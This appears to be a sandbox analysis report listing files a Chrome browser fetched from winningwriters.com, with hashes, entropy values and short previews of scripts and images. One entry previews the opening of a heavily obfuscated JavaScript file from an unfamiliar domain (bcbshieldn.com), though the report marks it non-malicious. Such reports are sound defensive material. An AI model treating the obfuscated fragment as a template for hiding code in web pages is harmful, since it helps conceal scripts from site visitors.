                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:/*!. * jQuery Migrate - v1.2.1 - 2013-05-08. * https://github.com/jquery/jquery-migrate. * Copyright 2005, 2013 jQuery Foundation, Inc. and other contributors; Licensed MIT. */.(function( jQuery, window, undefined ) {.// See http://bugs.jquery.com/ticket/13335.// "use strict";...var warnedAbout = {};..// List of warnings already given; public read only.jQuery.migrateWarnings = [];..// Set to true to prevent console output; migrateWarnings still maintained.// jQuery.migrateMute = false;..// Show a message on the console so devs know we're active.if ( !jQuery.migrateMute && window.console && window.console.log ) {..window.console.log("JQMIGRATE: Logging is active");.}..// Set to false to disable traces that appear with warnings.if ( jQuery.migrateTrace === undefined ) {..jQuery.migrateTrace = true;.}..// Forget any warnings we've already given; public.jQuery.migrateReset = function() {..warnedAbout = {};..jQuery.migrateWarnings.length = 0;.};..function migrateWarn( msg) {..var console =
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (4908), with no line terminators
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):4908
                                                                                                                                                                                            Entropy (8bit):5.82054140777349
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:96:1gWUfvlcY021mvXElnxad7OIJoodnbUCJdEjkRU1eKawytU7k:1DY0h8Rx47OIqWbZkeKawyL
                                                                                                                                                                                            MD5:6432CA458449917396470E39F224A2F4
                                                                                                                                                                                            SHA1:612803872D5FED3120838890DA902F16DDD6C09B
                                                                                                                                                                                            SHA-256:F7B4569ED06E2B89BEE05A8E27EB8B62239C401E476CCD7EA116EBD1F97876A9
                                                                                                                                                                                            SHA-512:18D4D4C9503BDE308B43071E2E450C09403650177F6AF6F2B6B6F6A76F66EEB137D96E6DE1C12608AD8B51BB8AF5852283621DB1987CCDE3F486D0DF6D3CC5FC
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://googleads.g.doubleclick.net/pagead/viewthroughconversion/1072733940/?random=1731960054416&cv=11&fst=1731960054416&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Tom%20Howard%2FJohn%20H.%20Reid%20Fiction%20%26%20Essay%20Contest&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top&rfmt=3&fmt=4
                                                                                                                                                                                            Preview:(function(){var s = {};(function(){var h=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,d){if(a==Array.prototype||a==Object.prototype)return a;a[b]=d.value;return a};function k(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var d=a[b];if(d&&d.Math==Math)return d}throw Error("Cannot find global object");} var m=k(this),p=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",t={},v={};function w(a,b,d){if(!d||a!=null){d=v[b];if(d==null)return a[b];d=a[d];return d!==void 0?d:a[b]}} function x(a,b,d){if(b)a:{var c=a.split(".");a=c.length===1;var e=c[0],g;!a&&e in t?g=t:g=m;for(e=0;e<c.length-1;e++){var f=c[e];if(!(f in g))break a;g=g[f]}c=c[c.length-1];d=p&&d==="es6"?g[c]:null;b=b(d);b!=null&&(a?h(t,c,{configurable:!0,writable:!0,value:b}):b!==d&&(v[c]===void 0&&(a=Math.random()*1E9>>>0,v[c]=p?m.Symbol(c):"$jscp$"+a+"$"+c),h(g,v[c],{co
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:PNG image data, 44 x 40, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):3421
                                                                                                                                                                                            Entropy (8bit):7.931143314896302
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:96:72r40f0BXj0tUPlMgKQ10FDSf1WHZD8nZ:Crh0xQSNMgKQ10Im2
                                                                                                                                                                                            MD5:CD98D3D9CB40F1475FC2125D701ABB02
                                                                                                                                                                                            SHA1:A754CDA395400F4848430649D1022F96F74F918F
                                                                                                                                                                                            SHA-256:76D9D6671B61F367B18ABF9F6BD216136EAE063DD8258B7B8B5F359CE15A5D03
                                                                                                                                                                                            SHA-512:0548FFB53C21FC8FCE3256ABEF783A08E191CC51CA6F8D76B0DF8FD0918B340089248518B6A3FFDB2622F24A6E750C6835AAA5ED1F386F15B1D80DB54684AA78
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://winningwriters.com/assets/images/seal-transparent-25x40-2019.png
                                                                                                                                                                                            Preview:.PNG........IHDR...,...(.............sRGB.........gAMA......a.....pHYs..........o.d....IDATXG...x.U......$.... A.b....."E..fA?,(Ep. ....".RE..."...J..".#.T..k3.;.^B.......9....s.w^4u..x.....2.Izj....`....0....v)V|..QXXh.zr@@...}.....P}.0.)..W..".".......zc.zR.t.4m.AOH....|..@ .2...\.y.inb\2}.....O..b.WDx.....MY..s..g.(Z.K..#+..+.'.R._..#...Boh..<$.`.i.....^.$......T..5..d..Z.[.#8mA.UJ..!ui.....[.n..K@.h....D.M.-.F.+....*....Fl.....z.....=F..c......[..o.3.M....Wn.?.....=.?R..8.......9T..A..|%%%.4.....Bj.e......j..'..5.....&.....6..F!{b..VR..l..4&Y(:.Q%a6J8..2.M..t...G.eY.'}.A:..........Y{p5 ,....0.36.a;.r/...8..9J.....LL.*.J.F_.-..c......j.:......7..3..W..^....*.`B~-..3.Q....H.......C...h.!7.A....#.y...O..'-.Z7jg++.b.)K.....M....X...9....0lf#.h.#oQ....c...a..8...cE.1h.3.#....#...=.......J.nE.@E..<A.5..z.......?_.......#<X..E......|......m..YB.n..l4.......R^a7...+.RV....sV.S.%..x.W*.f....0 ......m..}..8.V .l..*..C.Z$...g.+..%...=.%O.b.I.0.[
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 980x450, components 3
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):143476
                                                                                                                                                                                            Entropy (8bit):7.941841010920139
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3072:3xYSh6lEI9zg6UWhRbGi4maWQsBg7vKaJH:Oygg6UWhqWQ0+KS
                                                                                                                                                                                            MD5:11E157E66B1999F763538C0D576ABCF7
                                                                                                                                                                                            SHA1:6A68E7AF7BB0EBF576AD24989F592CF0C8C37854
                                                                                                                                                                                            SHA-256:60CD65CC1FFDDAC0ACD0874D0B99FEFEBBD09D3A46F393C1C0EFB5F9A5D79109
                                                                                                                                                                                            SHA-512:165379F7FBAB56033B64F05650C84EC17C55F1626A3563A38628470EBB614C8ECB119E1E7F8D6AE8CE2B13A7A9CCA7179F06F32D012CD1072F58A6100653243F
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://winningwriters.com/graphics/wergle/garnham_home_page_slide_a.jpg
                                                                                                                                                                                            Preview:......Exif..II*.................Ducky.......P......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c002 79.a6a63968a, 2024/03/06-11:52:05 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:CD7654A112206811822AE8C6A079CFFF" xmpMM:DocumentID="xmp.did:EBF07E8851D711EFBA20CF78438B8831" xmpMM:InstanceID="xmp.iid:EBF07E8751D711EFBA20CF78438B8831" xmp:CreatorTool="Adobe Photoshop CC 2019 (Macintosh)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:9f642b53-77ec-49cf-b5aa-b2fc8382dc41" stRef:documentID="adobe:docid:photoshop:93bd72ea-6557-5547-9f4b-831cf011a6ae"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d..............................
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):947841
                                                                                                                                                                                            Entropy (8bit):5.1677205815743115
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:24576:a/Ue7tWlWE0bH2aVf6zZE/Q++Z+Sb/kOLYmizgaBr96aYScvz29DkINFVVoxu:a8eJWb0bWaAzZIQ++QSb/kOLYmizCaYG
                                                                                                                                                                                            MD5:B53B76AA9D3882CE0758085D79880339
                                                                                                                                                                                            SHA1:ECB956BE7C4576D759FB104547630C0F4C0CD19C
                                                                                                                                                                                            SHA-256:A1B63DC61424245C99D54DFDFC95BF08AD24A2FB9A1727F1E245E713FA6C72D8
                                                                                                                                                                                            SHA-512:8237D1C8D121CF88FBD8AD9100E20891ABB08A91CCEDCA14C6DABBC4013A86BC0C200BBF861B751F438CF4233D0DBEF3CFF24B90BAC8435B4495F977E61B06A1
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://bcbshieldn.com/cflaer.js
                                                                                                                                                                                            Preview:function _0x31bf(_0x10783e,_0x356c5a){const _0x338a4a=_0x242a();return _0x31bf=function(_0x1e8151,_0x3b4331){_0x1e8151=_0x1e8151-(-0x5*0x401+-0x1b9d*0x1+0x3177);let _0x5784b7=_0x338a4a[_0x1e8151];if(_0x31bf['EoVILL']===undefined){var _0x882112=function(_0x2be794){const _0x2b17ca='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';let _0x1bb4f0='',_0x484a15='',_0x116e30=_0x1bb4f0+_0x882112;for(let _0x3de974=0x38*0x45+0xbda*-0x3+0x1476,_0x3bb0c9,_0x40931c,_0x37ef15=-0x971*0x1+0x32*-0xbb+0x2df7;_0x40931c=_0x2be794['charAt'](_0x37ef15++);~_0x40931c&&(_0x3bb0c9=_0x3de974%(-0x1387+-0x1be3+0x2f6e)?_0x3bb0c9*(-0x3*-0x44f+-0x2619+0x196c)+_0x40931c:_0x40931c,_0x3de974++%(0x5d9*-0x2+-0x1fbf+0x1*0x2b75))?_0x1bb4f0+=_0x116e30['charCodeAt'](_0x37ef15+(-0x253f+-0x10cc+-0x3*-0x1207))-(-0x3*0x3c3+0x1145+-0x5f2)!==0x2264+0x126*0x8+-0x2b94?String['fromCharCode'](0x2*-0x712+0xe2*0x7+0x8f5&_0x3bb0c9>>(-(0x21b5*-0x1+-0x1822+-0xfb*-0x3b)*_0x3de974&-0x3*-0x2d9+0x4*-0x6e5+0x130f)):_0x3de974:0x3
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (9217)
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):244531
                                                                                                                                                                                            Entropy (8bit):5.4538573889137245
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3072:8FLeYH8AtPJ137OeR8NteqZEbkxZNsucrl0xYurPK713E3:8FLeYc+PJxH8NNfFcrHurPK7136
                                                                                                                                                                                            MD5:36E181233B4F306FA5B8DDA3B15201E2
                                                                                                                                                                                            SHA1:FDCCF3ABC17A9DE5CE2DBB5AD888C9698C7D2E13
                                                                                                                                                                                            SHA-256:43A683165A27224EF2D2717BD57C8C203AA570CE39140504D086562EEFBB0F1F
                                                                                                                                                                                            SHA-512:C754FC2C7B366E4475EFB11CF5C8F4F64427E00D7149F7DC10C7E4A726674335143F155F429ACF44210E93F8AA356E06879219E21A6AABE6AF92981E5C905348
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:/**.* Copyright (c) 2017-present, Facebook, Inc. All rights reserved..*.* You are hereby granted a non-exclusive, worldwide, royalty-free license to use,.* copy, modify, and distribute this software in source code or binary form for use.* in connection with the web services and APIs provided by Facebook..*.* As with any software that integrates with the Facebook platform, your use of.* this software is subject to the Facebook Platform Policy.* [http://developers.facebook.com/policy/]. This copyright notice shall be.* included in all copies or substantial portions of the software..*.* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS.* FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR.* COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER.* IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN.* CONNECTION WI
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:PNG image data, 10 x 10, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):1003
                                                                                                                                                                                            Entropy (8bit):5.8550025694771035
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:24:Z1he91Wwh82lYSKwKAUymVtbJT3ouyJ3V2K3GTVRv:nqQvnLomDJIJ3Narv
                                                                                                                                                                                            MD5:77AEAA52715B898B73C74D68C630330E
                                                                                                                                                                                            SHA1:B3A4EE645BA494F52840EF8412015BA0F465DBE0
                                                                                                                                                                                            SHA-256:A163BAB86035B0BA62C98FBBD4D8B4F5EDABBBB774ECA0B5E9E5081B5711B2AB
                                                                                                                                                                                            SHA-512:84C18F1AF90BA848B2888754E20A28487C556B9A1275DC1371E0D0964D3803FBFE79A294188C37B22331D88C6DE5363E5EDE3FC254879721540959AEB712391C
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://winningwriters.com/assets/fancybox/fancybox_overlay.png
                                                                                                                                                                                            Preview:.PNG........IHDR..............2.....tEXtSoftware.Adobe ImageReadyq.e<...fiTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:B0C8483B9CE3E1118185EC97ECB4D81E" xmpMM:DocumentID="xmp.did:FDE98EBC032611E29899DC09CE2C174E" xmpMM:InstanceID="xmp.iid:FDE98EBB032611E29899DC09CE2C174E" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:B1C8483B9CE3E1118185EC97ECB4D81E" stRef:documentID="xmp.did:B0C8483B9CE3E1118185EC97ECB4D81E"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.v......IDATx.b.....@.`b ..*..B....h...._......IEND.
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:PNG image data, 27 x 10, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):1198
                                                                                                                                                                                            Entropy (8bit):6.259856503965695
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:24:M01htZdWwylZ82lYSqMHiWeA45AVGBDEVQVGB/T3ohyJ3V3TeAfGwA9vlhI7:M6qinNuiWeLlEB9JJ3JTem6vnI7
                                                                                                                                                                                            MD5:CC59B8489FF59000FFE150A3034675C8
                                                                                                                                                                                            SHA1:9CBA08AA9CD289D5E5CA91E854AB6B4A9FAB73D2
                                                                                                                                                                                            SHA-256:FD3E00D56AA64EDB7863C3766BF4107E813FC8B18C1B18D08B9CC24F6D437FD0
                                                                                                                                                                                            SHA-512:5D45D7E7A9C6F49AF777D1BA20D13968059E2161EB00651D49AE696472CDCAA250508E7FF812F7CF354B644626C408A3EDD3F99002E68A1D7634BC674392AA1B
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://winningwriters.com/assets/images/slideshow-pager.png
                                                                                                                                                                                            Preview:.PNG........IHDR.............E^%k....tEXtSoftware.Adobe ImageReadyq.e<....iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c061 64.140949, 2010/12/07-10:57:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpRights="http://ns.adobe.com/xap/1.0/rights/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpRights:Marked="False" xmpMM:OriginalDocumentID="uuid:C508247BAB39DE11919BBBE5BE681828" xmpMM:DocumentID="xmp.did:3B5D90C1379911E38CE7A04AE22DF9B7" xmpMM:InstanceID="xmp.iid:3B5D90C0379911E38CE7A04AE22DF9B7" xmp:CreatorTool="Adobe Photoshop CS6 (Macintosh)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:0A80117407206811822AAC03487464F8" stRef:documentID="uuid:C508247BAB39DE11919BBBE5BE681828"/> </rdf:Description> </rdf:RDF> </x:xmpme
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (4880), with no line terminators
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):4880
                                                                                                                                                                                            Entropy (8bit):5.821539458772735
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:96:1gWUfvlcY021mvXElnxad7OIJoodnbUCJdEjkRUtezAmtU7sFC:1DY0h8Rx47OIqWbZcezAmns
                                                                                                                                                                                            MD5:DB45B0063C2188EE54F4DA23E54EBE01
                                                                                                                                                                                            SHA1:B359C0F7AA0FB2AD5DE2E6C09A472CA7BC2E1324
                                                                                                                                                                                            SHA-256:216D10E26B9B23AEB22CA1A68D88CE2A8037713E57CE6A8CB6F668E6C90321FF
                                                                                                                                                                                            SHA-512:1706B725838532089608525C9D7966553C2DF335858EE28EFD73F38C701580E0696017806BA4196EC0A7565496BD857046680F7022E0E20B13D14B6D359A0D2C
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://googleads.g.doubleclick.net/pagead/viewthroughconversion/1072733940/?random=1731960102417&cv=11&fst=1731960102417&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Origin%20Story%20by%20Jendi%20Reiter&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top&rfmt=3&fmt=4
                                                                                                                                                                                            Preview:(function(){var s = {};(function(){var h=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,d){if(a==Array.prototype||a==Object.prototype)return a;a[b]=d.value;return a};function k(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var d=a[b];if(d&&d.Math==Math)return d}throw Error("Cannot find global object");} var m=k(this),p=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",t={},v={};function w(a,b,d){if(!d||a!=null){d=v[b];if(d==null)return a[b];d=a[d];return d!==void 0?d:a[b]}} function x(a,b,d){if(b)a:{var c=a.split(".");a=c.length===1;var e=c[0],g;!a&&e in t?g=t:g=m;for(e=0;e<c.length-1;e++){var f=c[e];if(!(f in g))break a;g=g[f]}c=c[c.length-1];d=p&&d==="es6"?g[c]:null;b=b(d);b!=null&&(a?h(t,c,{configurable:!0,writable:!0,value:b}):b!==d&&(v[c]===void 0&&(a=Math.random()*1E9>>>0,v[c]=p?m.Symbol(c):"$jscp$"+a+"$"+c),h(g,v[c],{co
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (645)
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):23136
                                                                                                                                                                                            Entropy (8bit):5.37000277635621
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:384:5N7WhsyZ3mw3DJeKZurcVCxHrXhYF/hxQ7SLp2EWJYZ/uS5:5N6xZ3mwI4urcVCxHrXhY9hOaQa/uS5
                                                                                                                                                                                            MD5:5C5CFD8F33E8FE13674392EEF6AD7A42
                                                                                                                                                                                            SHA1:1A3C31A361CCB7F7C1B0901ED82E669ABDE03D5F
                                                                                                                                                                                            SHA-256:0B53274F7044C36C735BDA1827C82D314379275C75D82F487466226F3AAA857B
                                                                                                                                                                                            SHA-512:1B9ADE38CC8F9BD0222E1FC58476BCFBAAA221D7534932C4BA160F532893D9260E0DB908C7B9269BE89FC07D158CAA814FB0DFC731C582F97C133AF55D0C7D82
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://winningwriters.com/assets/fancybox/jquery.fancybox.pack.js
                                                                                                                                                                                            Preview:/*! fancyBox v2.1.5 fancyapps.com | fancyapps.com/fancybox/#license */.(function(r,G,f,v){var J=f("html"),n=f(r),p=f(G),b=f.fancybox=function(){b.open.apply(this,arguments)},I=navigator.userAgent.match(/msie/i),B=null,s=G.createTouch!==v,t=function(a){return a&&a.hasOwnProperty&&a instanceof f},q=function(a){return a&&"string"===f.type(a)},E=function(a){return q(a)&&0<a.indexOf("%")},l=function(a,d){var e=parseInt(a,10)||0;d&&E(a)&&(e*=b.getViewport()[d]/100);return Math.ceil(e)},w=function(a,b){return l(a,b)+"px"};f.extend(b,{version:"2.1.5",defaults:{padding:15,margin:20,.width:800,height:600,minWidth:100,minHeight:100,maxWidth:9999,maxHeight:9999,pixelRatio:1,autoSize:!0,autoHeight:!1,autoWidth:!1,autoResize:!0,autoCenter:!s,fitToView:!0,aspectRatio:!1,topRatio:0.5,leftRatio:0.5,scrolling:"auto",wrapCSS:"",arrows:!0,closeBtn:!0,closeClick:!1,nextClick:!1,mouseWheel:!0,autoPlay:!1,playSpeed:3E3,preload:3,modal:!1,loop:!0,ajax:{dataType:"html",headers:{"X-fancyBox":!0}},iframe:{scroll
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:PNG image data, 200 x 200, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):81457
                                                                                                                                                                                            Entropy (8bit):7.993480782137265
                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                            SSDEEP:1536:L+up03fjmp29GXdqxApZVqAwAmg4hNRk+hRv9ofmHd6rssGFi3pSYAVNL0:Rp0L9GXdqzmmgCLSmHda73sV0
                                                                                                                                                                                            MD5:A493C5347CC972C58EC6EDBE3CB22927
                                                                                                                                                                                            SHA1:D2C70D196D4C576F080F1AE18C9D878AAE5FC7C1
                                                                                                                                                                                            SHA-256:3E7284E0ACE8D03897335CCC163B16658D2B33F66193426EA97E8D3E69760398
                                                                                                                                                                                            SHA-512:5DEC20714CC50A1B9D0DCC245F70462CE0F35B9DA488F92B674C877BE3622831A7652380C34BF7F38BE8DC2E4014E47996B87848FFFEC03A3929DA80933FDA96
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:.PNG........IHDR..............X......tEXtSoftware.Adobe ImageReadyq.e<....iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c001 79.1462899777, 2023/06/25-23:57:14 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:663bb13f-2490-4f33-b197-da6ca853dd87" xmpMM:DocumentID="xmp.did:7E8460D995E411EEBD159D1077689FB6" xmpMM:InstanceID="xmp.iid:7E8460D895E411EEBD159D1077689FB6" xmp:CreatorTool="Adobe Photoshop 25.2 (Macintosh)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:e1ae9024-45a5-4389-a222-60d502de5934" stRef:documentID="adobe:docid:photoshop:d7c5f106-b245-9a4a-8dbd-0fb72b6005a2"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.....:@IDATx.l.Y.,
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (5544)
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):259782
                                                                                                                                                                                            Entropy (8bit):5.556652735964768
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3072:zLJI6PFDXBd+/w08OH54P7o7U4RPACmQfU7B7mP9pLwhgFPO:nNDXB0XPNU7B7mP9pk
                                                                                                                                                                                            MD5:DE2B90AD4FA308878C3C41F23000ABF0
                                                                                                                                                                                            SHA1:C582229DCFA217F966EC8ADBC9615EBDF497D52B
                                                                                                                                                                                            SHA-256:AFEEC89F890E30AF106527D3CA62201E739A8C5DD1BC604394992AF01AD7BE91
                                                                                                                                                                                            SHA-512:EA1F3C1DC20845F6A6210417A835A12DAAEF5A75B1537FB908CADDD9A1904861E8BE4B2838FA80AED0DE4ECEF180560A1E8BF163AA6E6BF80F94787C88385F0C
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://www.googletagmanager.com/gtm.js?id=GTM-KFDBLZT
                                                                                                                                                                                            Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"16",. . "macros":[{"function":"__e"},{"function":"__gas","vtp_cookieDomain":"auto","vtp_doubleClick":true,"vtp_setTrackerName":false,"vtp_useDebugVersion":false,"vtp_useHashAutoLink":false,"vtp_decorateFormsAutoLink":false,"vtp_enableLinkId":false,"vtp_enableEcommerce":false,"vtp_trackingId":"UA-216038-1","vtp_enableRecaptchaOption":false,"vtp_enableUaRlsa":false,"vtp_enableUseInternalVersion":false,"vtp_enableGA4Schema":true},{"function":"__u","vtp_component":"PATH","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__aev","vtp_varType":"TEXT"},{"function":"__v","vtp_name":"gtm.elementUrl","vtp_dataLayerVersion":1},{"function":"__v","vtp_name":"gtm.triggers","vtp_dataLayerVersion":2,"vtp_setDefaultValue":true,"vtp_defaultValue":""},{"function":"__e"},{"function":"__j","vtp_name":"slider_name"},{"function":"__v","vtp_name":"gtm.elementClasses
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):947841
                                                                                                                                                                                            Entropy (8bit):5.1677205815743115
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:24576:a/Ue7tWlWE0bH2aVf6zZE/Q++Z+Sb/kOLYmizgaBr96aYScvz29DkINFVVoxu:a8eJWb0bWaAzZIQ++QSb/kOLYmizCaYG
                                                                                                                                                                                            MD5:B53B76AA9D3882CE0758085D79880339
                                                                                                                                                                                            SHA1:ECB956BE7C4576D759FB104547630C0F4C0CD19C
